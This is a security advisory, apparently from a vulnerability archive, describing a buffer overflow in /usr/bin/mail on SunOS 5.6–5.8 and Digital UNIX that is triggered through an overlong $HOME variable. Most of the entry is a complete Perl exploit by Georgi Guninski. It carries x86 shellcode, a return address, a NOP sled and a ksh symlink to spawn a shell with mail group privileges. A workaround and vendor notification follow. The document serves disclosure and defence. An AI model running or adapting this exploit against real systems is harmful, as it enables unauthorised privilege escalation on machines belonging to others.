COMMAND

    mail

SYSTEMS AFFECTED

    SunOS 5.6, 5.7, 5.8, Digital UNIX

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #46.
    There  is  a  buffer  overflow  in  SunOS  5.8  x86 with $HOME and
    /usr/bin/mail leading to egid=mail.  Details:

        HOME=`perl -e 'print "A"x1100'` ; export HOME
        mail a
        CTRL-C

    eip gets smashed with 0x41414141.

    Exploit:

    #!/usr/bin/perl
    # /usr/bin/mail exploit by Georgi Guninski
    use Env qw($HOME);
    #shell code taken from Pablo Sor's mailx exploit
    $shell = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06";
    $shell .="\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90";
    $shell .="\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0";
    $shell .="\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33";
    $shell .="\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec";
    $shell .="\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89";
    $shell .="\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50";
    $shell .="\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2";
    $shell .="\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4";
    $shell .="\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
    $RET = "\xa0\x6f\x04\x08" ; #may need to change this
    $OVER=1032;
    $ALL=1200;
    $buf=$RET x ($OVER/4) . "\x90" x ($ALL - $OVER - length($shell)) . $shell;
    system("/bin/ln -s /bin/ksh /tmp/xx");
    print "Written by Georgi Guninski, shell code taken from Pablo Sor's mailx exploit.\nPress
    CTL-C\n";
    $ENV{HOME}=$buf;
    exec "/usr/bin/mail","A";

    Solaris 7/Sparc  is vulnerable  as well.   Digital Unix  V4.0C  is
    vulnerable too.

    This was tested also on OpenBSD 2.8/i386 and /sparc, RedHat  Linux
    6.1/alpha  and  Debian  GNU/Linux  2.2r3/i386,  and  they  are not
    vulnerable.

SOLUTION

    Workaround: chmod -s  /usr/bin/mail.  Sun  was informed on  29 May
    2001 about /usr/bin/mail and shall release patches.